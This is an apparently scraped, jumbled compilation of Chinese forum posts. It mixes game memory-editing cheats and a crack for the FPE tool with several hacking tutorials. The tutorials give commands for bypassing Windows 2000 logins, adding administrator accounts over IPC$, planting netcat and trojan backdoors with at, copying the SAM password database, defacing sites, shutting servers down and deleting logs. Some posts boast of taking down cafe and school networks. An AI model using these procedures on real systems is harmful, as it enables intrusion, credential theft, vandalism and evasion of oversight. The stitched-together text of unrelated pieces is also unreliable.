答：不管圣系法系，锁能量都是一样的，先查找当前能量值，比如你现在的法术能量为500，切出去查找500，然后进龙族放一个法术，当看到法术能量值减少时，立即记住这个数据，用热键呼出FPE，查找当前值。一般只找到一条或两条地址，如有两条地址，随便锁哪一个都行。锁定值建议在1000~5000。
纯弓、纯盗、纯战士的魔法值如果也想锁定的话，建议先搜捕第一次值，一般为53，然后锁一次冰箭地址（详情请参照第4个答题），然后进龙族放一箭，数值会变为13，呼出FPE，查找出来后锁定就行了！

6、如何实现连击？
答：连击地址在人物晃动值的前4位，锁定为08h就行了(从01h~0Fh是不同的攻击值，棍术的连击也有，但是具体如何让其打出实际攻击，正在研究中)！示例如下：
（这是连击锁定值）08 00 00 00 01（这是人物晃动值锁定值）

7、如何变更攻击方法？
答：这里谈一种比较常用而且也是玩吧里最热的话题，也就是怎么样实现任何职业用无限多重火技能（本人建议用究极火，因为多重才5弹，究极8弹），首先，在龙族中使用魔法或技能，这里我们用祭师来做示例（因为本人是祭师：），使用治疗圣言（97h），集气，先不施放出去，这时用热键呼出FPE，查找97h（十六进制）或151（十进制），返回游戏，将角色切换为和平状态，然后切换出FPE，查找0，一般找到一个地址，有些人会找到几个地址，通常这个地址以0B开头，如果你不是拿得很准的话，建议找到多地址的朋友再进龙族用一回治疗圣言，然后再用热键呼出FPE查找97h或151,这样就只能剩下一个地址了。
点‘编辑’，然后在编辑里点数值，将它锁定为e4h，然后再进入编辑中，往下翻20行左右，这个时候你会看到一个比较有标志性的魔法和战斗技能数值的地址代码：cc cc
将cc cc的左下角数字锁为e4h,在cc cc后面有一个数值是01,把01的正下方锁定数值为3就大功告成了！示例如下：
00 00 CC CC 00 00 00 00 00 00 00 00 01 00 00 00
E4 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00

8、如何将使用出去的魔法效果转变（比如转变成经验或火鸟攻击）？
将搜索出来的第一个数值（详情请看第7答题）改为你想要的就行了，以后不管你用什么魔法或战斗技能，出去的效果都将变成你想要的。
比如我改为50h（火鸟术）,然后见着怪物就射，经验嘛，呵呵，当然是加的咯，还增加冥思哦：）

--------------------------------------------------------------------------------
[教学]关于如何快速查找弓、盗的战斗技能区修改解答（附法、祭）[高级]

1、查找人物晃动值

首先，在FPE的编辑中查找你自己的角色名称，并加单引号，如：’龙族官方官服MM’
一般人物晃动值地址存放在0B000000 - 0D000000这一段，所以，你可以先在位址中输入0B000000或0C000000（根据自己机器试验，哪个查找最快），一般一次性就可以查到人物晃动值地址，并把它锁为1 [如何分辩出人物晃动值代码并锁定请看我以前文章]

2、查找技能代码值

在查到人物晃动值后，继续点查找，输入‘烫’，一次性可以找到带标志性的CC CC代码段
一般显示为
00 00 CC CC 00 00 00 00 00 00 00 00 01 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
弓锁CC CC下行左数二个位址为E4H（多重火代码）等级为3
盗锁CC CC下行左数二个位址为EFH（冰暴代码） 等级为3

数第一个CC向上23行，锁排头第5个代码（弓为E4H，盗为EFH）根据机器不同位置略有不同（如果你学会一样技能或魔法，那么切回游戏用一个技能或魔法后，你会看到CC上数第22行有一段连续的 8位代码 连续8位代码上行右一个位址有一个单独代码，锁为与刚才你改的代码相同就行驶了）

比如我在游戏中用一次多重火技能后，CC CC上数22~23行代码一般显示为
00 00 00 00 00 00 00 00 E4 00 00 00 00 00 00 00
00 00 00 00 AD E5 B2 C1 00 00 00 00 00 00 00 00

未学过任何魔法或技能的人物，请先找一个会魔法或技能的号先改一次，记住该代码在第一个CC上数第几行，偏左还是偏右，然后再换新人物来改，一次就可以成功。

同样，法师改法只是增加冰箭代码（冰箭锁人物晃动值前四位址为2，并查找魔法能量值代码锁定而以。魔法能量值均是固定地址，不会变动。所以，当你查找过一次魔法能量值并锁定成功后，你将该地址记下，下次直接在位址中输入该地址并锁定就行了。
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
[教学]人物1级快速锁定多重火

第一步：打开FPE，选辑编辑栏，在位址中输入0B000000回车定位，然后在查找自己名字，注意前后加单引号，找到最后一个[一般一次找到，只要在游戏中不与别人对过话]，发现人物晃动值！锁为01H

第二步：查找烫[加单引号]，会发现CC CC这样标志性的代码，在第二个CC的后面9位一定会是一个01的数值，锁01后面4个位址的数值为E4H，锁01下面一行的数值为3，然后光标选中01，按键盘的向上键↑，按24次[也就是上移了24行]，锁该值为E4H即可。
--------------------------------------------------------------------------------

建议大家使用小连击即可，这也就是为何用新月外挂很少被封的原因，小连击一般不易被查出。

一.下载本论坛FPE2001
二.打开压缩包
三.安装FPE2001
四.将安装包中的破解文件tt.dll文件覆盖至安装完成的FPE2001文件（有很多人说打开破解文件夹以后里面没东西，那是因为你的系统文件夹设置成了隐藏文件不可见，只要点击文件夹上粘贴上的查看然后选文件夹选项，再点查看，把里面的隐藏文件那一栏改为显示所有文件就行了，这是98系统，NT以上系统在工具里面改。）
五.复制FPE.exe文件 把新的FPE.exe文件改名为111.exe
六.双击FPE.exe文件 然后选择读档 文件类型选为*.* 找到111.exe 并读档
七.在编辑中寻找 'jaw'
八.发现代码 从发现的第一个代码开始改 31 31 31 5C 31 31 31
九.继续第七第八步 直到提示找不到代码为止
十.关闭FPE
十一.将你安装完成的FPE文件夹(很长一串英文，最后是2001)改名为简单的数字1112001
十二.打开C:\WINDOWS\regedit.exe
十三.在注册表中打开HKEY_LOCAL_MACHINE\SOFTWARE
十四.把jaw 改名为111
十五.把该目录中FPE改名为111
十六.打开HKEY_LOCAL_MACHINE\SOFTWARE\111\111
十七.把右边表格中的 OpenPath RecPath 两项路径中的 Fix People Expert 2001改为1112001
十八.打开111.exe 把暂停游戏钩子去掉

[sell=10] 本人经过种种的测试,练了N个号,在个个地图上实验过,最快的代码在这里:
1---11级在新手村,11---70在瓦南东部,代码是10 27 FF 27(建议在60级前代码写10 27 90 27,在60级到70级间用90 27 FF 27),70--85在光洞,代码是10 27 FF 27,85--110去大喜,代码是10 27 90 27,114---120去毒2,代码是10 27 9F 27,120--128在毒3,代码是10 27 92 27,128--140到河岸,代码是10 27 A2 27,剩下的你可以选择混的或者去那克顶楼蹲点打,140--145在那克顶楼470.450坐标打,145--150在那克顶楼250.250打!

本表顺序是按做G武的属性表里面的顺序排列的
项目 效果 G1 G2 G3 G4 G5 上限
Force 物品物理伤害力增加 10 20 30 40 50 G20
Accurate 物理攻击成功率增加% 2% 4% 7% 12% ？ G10
Weary 打击时依伤害力的比例夺取对方的体力(Health)1 2 4 6？ G10
Desire 打击时依伤害力的比例夺取对方的生命(life) 18 27 45 63 ？ G10
Distant 远攻%(长距离武器,攻击距离较远时) 6% 11% 16% 21% 26% G20
Critical Critical伤害力出现几率增加 2 4 8 12 19 G10
Fatigue 打击时夺取对方体力过来(Health) 2 3 5 7 ？ G10
Robber 打击时夺取对方生命过来(life) 2 3 5 7 ？ G10
Hardest AC数值增加(物理性防御力增加) 6 11 17 22 28 G20
Smart 物理性攻击的回避率增加 3% 7% 13% 21% 25% G10
Strike 依攻击者伤害力的比例来反击 27 54 81 137 173 G10
Counterattack 依攻击者Life最大值的比例来反击攻击者 3 6 10 14 19 G10
Snag 打击时让对方麻痹(几率性) 3 5 7 10 13 G10
Vertigly 打击时让对方陷入混乱(几率性) 3 5 7 10 13 G10
Poison 打击时让对方中毒(几率性) 3 5 7 10 13 G10
Stiff 打击时让对方石化(几率性) 3 5 7 10 13 G10
Slack 打击时让对方速度变慢(几率性) 3 5 7 10 13 G10
Life Life的最大值增加 330 876 1428 1974 ？ G20
Fatal Life一次自动恢复量增加% 3% 6% 12% 19%？ G10
Health Health的最大值增加6 14 23 32？ G10
Speed 角色的移动力增加 4 6 8 10 14 G20
Mana Mana的最大值增加 14 62 124 221 ？ G10
Magic Mana一次自动恢复量增加% 3% 6% 12% 19% 21% G10
Wise 魔法施法时间缩短% 3% 6% 12% 19% 21% G10
Bear 施法维持时间增加% 3% 6% 12% 19% 21% G10
Divine Divine的最大值增加 14 62 124 221 ？ G10
Nature Divine一次自动恢复量增加% 3% 6% 12% 19% 21% G10
Wise 魔法施法时间缩短% 3% 6% 12% 19% ？ G10
Bear 施法维持时间增加% 3% 6% 12% 19% ？ G10
Magic Vigor 巫师系魔法伤害力增幅 12 24 36 48 60 G20
Magic Stay 巫师系魔法持续时间增幅% 16% 32% 48% 64% 82% G20
Speed 角色的移动力增加 4 6 8 10 14 G20
Nature Vigor 祭司魔法伤害力增幅 12 24 36 48 60 G20
Nature stay 祭司系魔法持续时间增幅% 16% 32% 48% 64% 82% G20
Speed 角色的移动力增加 4 6 8 10 14 G20
Curse 施展时咒诅系魔法效果持续时间增加 8 16 24 32 48 G20
Aid 施展时补助系魔法效果持续时间增加 16 32 52 76 104 G20
Masking 施展时保护系魔法效果持续时间增加 10 20 30 50 68 G20
Basic Resist 穿破对方魔法抵抗力并攻击(机率) 2% 4% 7% 12% 14% G10
Strength 能力数值Str的增加 3 7 14 25 28 G20
Endurance 能力数值Endu的增加 3 7 14 25 28 G20
Constitution 能力数值Con的增加 3 7 14 25 28 G20
Dexterity 能力数值Dex的增加 3 7 14 25 28 G20
Constitution 能力数值Con的增加 3 7 14 25 28 G20
Movement 能力数值Movp的增加 3 7 14 25 28 G20
Intelligence 能力数值Int的增加 3 7 14 25 28 G20
Wizard 能力数值WS的增加 3 7 14 25 28 G20
Devil 打击时夺取对方的MANA过来2 3 5 7？ G10
Witch 打击时依伤害力的比例夺取对方的MANA过来 10 14 24 34 ？ G10
Wisdom 能力数值Wis的增加 3 7 14 25 28 G20
Priest 能力数值PS的增加 3 7 14 25 28 G20
Evil 打击时依伤害力的比例夺取对方的Divine过来 10 14 24 34 ？ G10
Satan 打击时夺取对方的Divine过来 2 3 5 7 ？ G10
Ghost 佩带的话可以看幽灵 ? ? ? ? ? ?
Resist Freeze冰系魔法抵抗力增加 4 8 12 16 20 G20
Resist All所有系魔法抵抗力增加 2 4 6 8 10 G20
Evasion 攻击魔法回避率增加%(对方的攻击魔法无效化) 3% 7% 13% 21% 25% G10
Resist Venom毒系魔法抵抗力增加 4 8 12 16 20 G20
Resist Lightning电击系魔法抵抗力增加 4 8 12 16 20 G20
Resist All所有系魔法抵抗力增加 2 4 6 8 10 G20
Evasion 攻击魔法回避率增加%(对方的攻击魔法无效化) 3% 7% 13% 21% 25% G10
Resist Paralysis 麻痹系魔法抵抗力增加 4 8 12 16 20 G20
Resist Blaze火系魔法抵抗力增加 4 8 12 16 20 G20
Resist All所有系魔法抵抗力增加 2 4 6 8 10 G20
Evasion 攻击魔法回避率增加%(对方的攻击魔法无效化) 3% 7% 13% 21% 25% G10
Resist Holy神法系抵抗力增加 4 8 12 16 20 G20

1、分析
先取出动画头像的每一帧，组合如下。(拼起来原来是这模样。。。)
2、制作
新建（CTRL＋N），大小为：88＊31，背景为白色。
将刚才的组合图按此放在新建的图上。
打开帧面板（SHIFT＋F2），设置帧延时为(100)/100秒
选中状态下，在修改菜单->动画->选择动画
对弹出后的窗口，做如下设置
共10帧，方向为90度垂直。
单击图片
单击帧面板最后一帧（第10）
单击图片中的那个小红点，不要放掉。。。
把小红点拖到，大约如下位置。（刚好是SKY的头顶:em01）

除了首尾为100，其它都设置成20。循环次数为“永久”
设置方法为双击数字即可。可以按住SHIFT批量操作2－9帧。
单击控制键进行预览。
偶也是才学的哦!

入侵步骤：

一，获得管理员账号：

　　我们先对一个网段进行扫描，扫描端口设为3389，运行客户端连接管理器，将扫描到的任一地址加入到，设置好客户端连接管理器，然后与服务器连结。几秒钟后，屏幕上显示出WIN2000登录界面（如果发现是英文或繁体中文版，放弃，另换一个地址），用CTRL+SHIFT快速切换输入法，切换至全拼，这时在登录界面左下角将出现输入法状态条（如果没有出现，请耐心等待，因为对方的数据流传输还有一个过程）。用右键点击状态条上的微软徽标，弹出“帮助”（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞），打开“帮助”一栏中“操作指南”，在最上面的任务栏点击右键，会弹出一个菜单，打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如，该系统安装在Ｃ盘上，就在空白栏中填入"c:winntsystem32"。然后按“确定”，于是我们就成功地绕过了身份验证，进入了系统的SYSTEM32目录。
　 现在我们要获得一个账号，成为系统的合法用户。在该目录下找到"net.exe"，为"net.exe"创建一个快捷方式，右键点击该快捷方式，在“属性”－;“目标”－;c:winntsystem32 et.exe后面空一格，填入"usergu est /active:yes"点“确定”。这一步骤目的在于用net.exe激活被禁止使用的guest账户，当然也可以利用"user 用户名　密码／add"，创建一个新账号，但容易引起网管怀疑。运行该快捷方式，此时你不会看到运行状态，但guest用户已被激活。然后又修改该快捷方式，填入"userguest 密码"，运行，于是guest便有了密码。最后，再次修改，填入“localgroupadministratorsguest /add，将guest变成系统管理员。

注意事项：

１、在这过程中，如果对方管理员正在使用终端服务管理器，他将看到你所打开的进程id，你的ip和机器名，甚至能够给你发送消息。

２、终端服务器在验证你的身份的时候只留给了你一分钟的时间，在这一分钟内如果你不能完成上述操作，你只能再连结。

３、你所看到的图像与操作会有所延迟，这受网速的影响。

二，创建跳板：

　　再次登录终端用务器，以"guest"身份进入，此时guest已是系统管理员，已具备一切可执行权。打开“控制面板”，进入“网络和拔号连接”，在“本地连接”或“拔号连接”中查看属性，看对方是否选择“Microsoft 网络的文件和打印机共享”，如果没有，就打上勾。对方如果使用的是拔号上网，下次拔号网络共享才会打开。

　　退出对方系统，在本地机命令提示符下，输入netuse \IP AddressIPC$ ["password"] /user:"guset"，通过IPC的远程登陆就成功了。
登陆成功之后先复制一个Telnet的程序上去（小榕流光安装目录下的Tools目录里的Srv.exe,另外，还有nt ml.xex，一会要用），这个程序是在对方上面开一个Telnet服务，端口是99。

　　copy c:hacksrv.exe \***.***.***.***ad min$然后利用定时服务启动它，先了解对方的时间：net time \***.***.***.***
显示：\***.***.***.*** 的当前时间是 2001/1/8 下午 08:55 命令成功完成。然后启动srv.exe:at \***.***.***.*** 09:00 srv.exe　
显示：新加了一项作业，其作业 ID = 0过几分钟后，telnet ***.***.***.*** 99 这里不需要验证身份，直接登录，显示：c:winnt:system32; 我们就成功登陆上去了。然后又在本地打开命令提示符，另开一个窗口，输入：copy c:hack tlm.exe \211.21.193.202admin$
把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口，运行ntlm.exe

C:WINNTsystem32;ntlm

显示：
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:WINNTsystem32;
C:WINNTsystem32;

　　好，现在我们来启动WIN2000本身的telnet，首先终止srv.exe的telnet服务：ne t stop tel net　系统告诉你并没有启动telnet，不理它，继续：net start telnet　这次真的启动了telnet，我们可以在另开的命令提示符窗口telnet到对方的23端口，验证身份，输入我们的guest账号和密码，它就真正成为我们的跳板了。我们可以利用它到其它的主机去。

　　三、扫除脚印：

删除为net.exe 创建的快捷方式，删除winntsystem32logfiles下边的日志文件

补漏方法：

1、打补丁

2、删除输入法帮助文件

3、停止终端服务。

只要你拥有某ip的用户名和密码，那就用ipc$做连接吧！

这里我们假如你得到的用户是hbx，密码是123456。假设对方ip为127.0.0.1

net u-se \\127.0.0.1\ipc$ 123456 /user:hbx

退出的命令是

net u-se \\127.0.0.1\ipc$ /delte

下面的操作你必须登陆后才可以用.登陆的方法就在上面.

----------------------

下面我们讲怎么创建一个用户，由于sa的权限相当于系统的超级用户.

我们加一个heibai的用户密码为lovechina

net user heibai lovechina /add

只要显示命令成功，那么我们可以把他加入administrator组了.

net localgroup admini-strators heibai /add

----------------------

这里是讲映射对方的c盘，当然其他盘也可以，只要存在就行了.我们这里把对方的c盘映射到本地的z盘.

net use z:\\127.0.0.1\c$

----------------------

net start telnet

这样可以打开对方的telnet服务.

----------------------

这里是将guest用户激活，guest是nt的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。

net user guest /active:yes

----------------------

这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！

net usergue st lovechina

net命令果然强大啊！

2:at

一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？

那么需要用at命令，这里假设你已经登陆了那个服务器。

你首先要得到对方的时间，

net time \\127.0.0.1

将会返回一个时间，这里假设时间为12:1，现在需要新建一个作业，其id=1

at \\127.0.0.1 12:3 nc.exe

这里假设了一个木马，名为nc.exe，这个东西要在对方服务器上.

这里介绍一下nc，nc是netcat的简称，为了方便输入，一般会被改名.它是一个telnet服务，端口为99.

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

3:telnet

这个命令非常实用，它可以与远方做连接，不过正常下需要密码、用户，不过你给对方种了木马，直接连到这个木马打开的端口.

telnet 127.0.0.1 99

这样就可以连到对方的99端口.那你就可以在对方运行命令了，这个也就是肉鸡.

4:ftp

它可以将你的东西传到对方机子上，你可以去申请个支持ftp上传的空间，国内多的是，如果真的找不到，我http://www.51.net/，不错的.当我们申请完后，它会给用户名，密码，以及ftp服务器.

在上传前需要登陆先，这里我们假设ftp服务http://www.51.net/，用户名是hucjs，密码是654321

ftp http://www.51.net/

他会要求输入用户，成功后会要求输入密码.

----------------------

下面先说上传，假设你需上传的文件是index.htm，它位于c:\下，传到对方d:\

get c:\index.htm d:\

假设你要把对方c盘下的index.htm，下到你的机子的d盘下

put c:\index.htm d:\

5:copy

下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好ipc$连接才有效。

这里我们把本地c盘下的index.htm复制到127.0.0.1的c盘下

copy index.htm \\127.0.0.1\c$\index.htm

----------------------

如果你要复制到d盘下把c改为d，就行了！

copy index.htm \\127.0.0.1\d$\index.htm

----------------------

如果你要把他复制到winnt目录里

就要把输入

copy index.htm \\127.0.0.1\ad min$\index.htm

ad min$是winnt

----------------------

要把对方的文件复制过来，顺便告诉大家nt的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名

下面就把127.0.0.1的数据库复制到本地c盘下

copy \\127.0.0.1\ad min$\repair\sam._ c:\

----------------------

6：set

如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用set命令！

下面是我得到的结果！我来分析它，只是找主页在那而已。

computername=pentiumii
comspec=d:\winnt\system32\cmd.exe
cｏｎtent_length=0
gateway_interface=cgi/1.1
http_accept=*/*
http_accept_language=zh-cn
http_cｏｎnectiｏｎ=keep-alive
http_host=当前登陆者的ip，这里本来是显示我的ip，被我删除了
http_accept_encoding=gzip， deflate
http_user_agent=mozilla/4.0 (compatible; msie 5.0; windows 98; digext)
number_of_processors=1
os2libpath=d:\winnt\system32\os2\dll;
os=windows_nt
path=d:\winnt\system32;d:\winnt
pathext=.com;.exe;.bat;.cmd
path_translated=e:\vlroot主页放在的地址，只要你看到path_translated=的后面就是主页的存放地址。这里是e:\vlroot
processor_architecture=x86
processor_identifier=x86 family 6 model 3 stepping 3， genuineintel
processor_level=6
processor_revisiｏｎ=0303
prompt=$p$g
query_string=/c+set
remote_addr=xx.xx.xx.xx
remote_host=xx.xx.xx.xx
request_method=get
_name=/s/..%2f../winnt/system32/cmd.exe
server_name=xx.xx.xx.xx
server_port=80
server_port_secure=0
server_protocol=http/1.1
server_software=microsoft-iis/3.0对方使用iis/3.0
systemdrive=d:
systemroot=d:\winnt
tz=gmt-9
userprofile=d:\winnt\profiles\default user
windir=d:\winnt

粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个方法才能100%的找到主页的名称，当你dir这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入xx.xx.xx.xx/文件名，这样只要看到和xx.xx.xx.xx看到的也面一模一样，那么这就是主页的名称了。

7：nbtstat

如果你扫到一部nt的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！

现在网上很多nt的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。

命令是

nbtstat -a xx.xx.xx.xx

-a一定要大写哦。

下面是得到的结果。

netbios remote machine name table

name type status
---------------------------------------------
registered registered registered registered registered registered registered reg
istered registered registered registered
mac address = 00-e0-29-14-35-ba
pentiumii <00> unique
pentiumii <20> unique
orahotown <00> group
orahotown <1c> group
orahotown <1b> unique
pentiumii <03> unique
inet~services <1c> group
is~pentiumii...<00> unique
orahotown <1e> group
orahotown <1d> unique
..__msbrowse__.<01> group

粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是<03>的话，那他前面的就是用户。

这里的用户是pentiumii。

8：shutdown

关了对方的nt服务器的命令

shutdown \\ip地址 t:20

20秒后将nt自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。

9：dir

这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。

你可以本地试下。

10：echo

著名的漏洞unicode，这个命令可以简单的黑一下有这个漏洞的主机。

我们假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”写入index.htm，有2种方法，大家看看有什么区别。

echo 南京大屠杀铁证如山，任何日本人不得抵赖！>index.htm

echo 南京大屠杀铁证如山，任何日本人不得抵赖！>>index.htm

第一个的意思是覆盖index.htm原有的内容，把“南京大屠杀铁证如山，任何日本人不得抵赖！”写进index.htm。

第二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”加到index.htm里面。

“>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。

大家可以本地试下。

可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方的目录里。

1、首先，我们需要申请一个**的主页空间。

2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器为例。）
open upload.chinaren.com（你的ftp服务器，申请时你的空间提供商会给你的）
cnhack（你申请时的用户名）
test（你申请时的密码）
get index.htm c:\inetpub\wwwroot\index.htm（这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm）
bye（退出ftp对话，相当在98下的dos，用exit退出dos）

具体的做法：
输入 echo open upload.chinaren.com> c:\cnhack.txt
输入 echo cnhack >> c:\cnhack.txt
输入 echo 39abs >> c:\cnhack.txt
输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt （利用ftp的-s参数，执行文件里的内容。）

等命令完成时，文件已经下载到你指定的文件里了。

注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。）

记得要 del c:\cnhack.txt

11:attrib

这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。

attrib -r index.htm

这个命令是把index.htm的只读属性去掉。

如果把“-”改为“+”则是把这个文件的属性设置为只读

----------------------

attrib +r index.htm

这个命令是把index.htm的属性设置为只读。

12:del

当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。

nt的日志有这些

del c:\winnt\system32\logfiles\*.*
del c:\winnt\ssytem32\cｏｎfig\*.evt
del c:\winnt\system32\dtclog\*.*
del c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log

只要删除这些就可以了。有些系统nt安装在d盘或其他盘，就要把c改成其他盘。

包夜啊!过两天就可以回家了舒服啊!

没事干只好找找乐趣了,.

先拿出SuperScan哈哈熟悉的画面一看就舒服!在里面的开始和结束端口里输入3389

然后随便在QQ里输入个网段,然后点扫描.....................

一顿狂扫只后嘿嘿还真不少开3389的端口

接着大开咱么的论坛主页里的http://www.nshacker.com/tsweb/

把那写开了3389端口的机器添进去

然后点连接嘿嘿,基本都可以连上的

然后在用户名里输入:administrator

要是运气好的话就可以连进去了

嘿嘿,,(可是管理员权限哦)下面要怎么处置你的肉鸡就看你个人的了!

嘿嘿

我只说这么多了啊!@

有什么不懂的就直接问吧

我会直接回复的!@

还有一点要是输入administrator

连不上的话,就换别的IP,或者试试我上次发的输入法漏洞

总会有成功'|!!

嘿嘿！

到网吧看了下 还真发现个漏洞 那就是路由的

我先说过程！

上www.hao123.com然后找到本机IP然后在IE里输入本机IP！

就看到了 网吧路由的登陆窗口了！

而且密码是自动保存的！

哈哈 ！先在想怎么搞就怎么搞了！

我现在已经把两个网吧的机器都不能上网了！

呵呵！

我现在还不能确定那个操作系统是不是2000的

无意之间扫描主机的时候看到个9000端口接着后面是9001,9002

然后我就在地址里输入http://.....:9001/

回车然后就看到了一个学校网站的收费系统!下面有继续和取消按钮!

我选择继续但是不能跳转! 然后我在地址栏里输入http://.....:9001/15646546546

后面的数字随便 接着回车

没想到的是这样就造成了服务器拒绝服务!

导致我们学校整个网络掉线!现在想想我都心寒~

后来我到网站上去查了一下9000端口是什么端口!到现在也没结果!

望有高手指点!

这两天学校到处查 还好我早有准备了!

郁闷啊!

先给大家看个FLASH哦！感人的看的我都想哭了http://yiyie.91i.net/13.swf！（与本文无关）

好了，现在开始正题！

首先去下个软件叫：scanipc

下载地址：http://www.20cn.net/cgi-bin/download/down.cgi?down=http://www.20cn.net/download/20cn/scanipc.rar

然后打开它，画面很简单！

然后在开始地址里输入开始地址：xxx.xxx.xxx.1

结束地址里输入：xxx.xxx.xxx.255

好了地址配制就OK了！

现在在去找个不被查杀了木马！我这里就以冰河做例子了！下载冰河后解开压缩里面有一个SERVER的文件！

现在在到scanipc这里来选择木马这一栏目下的浏览选项找到冰河（SERVER）然后点打开

好了这些搞好后就可以点开始扫描了！要是运气好不一会就有很多肉鸡哦！

等待一分钟后就可以用我们的冰河客户端连接了哈！

在这说明下利用什么原理入侵的

实际上是利用对方机器的IPC空连接把木马传过去！在用at 命令定时运行的！

教程就到这了！也许上面的解释不太清楚！请谅解 ！    -----------------------------yiye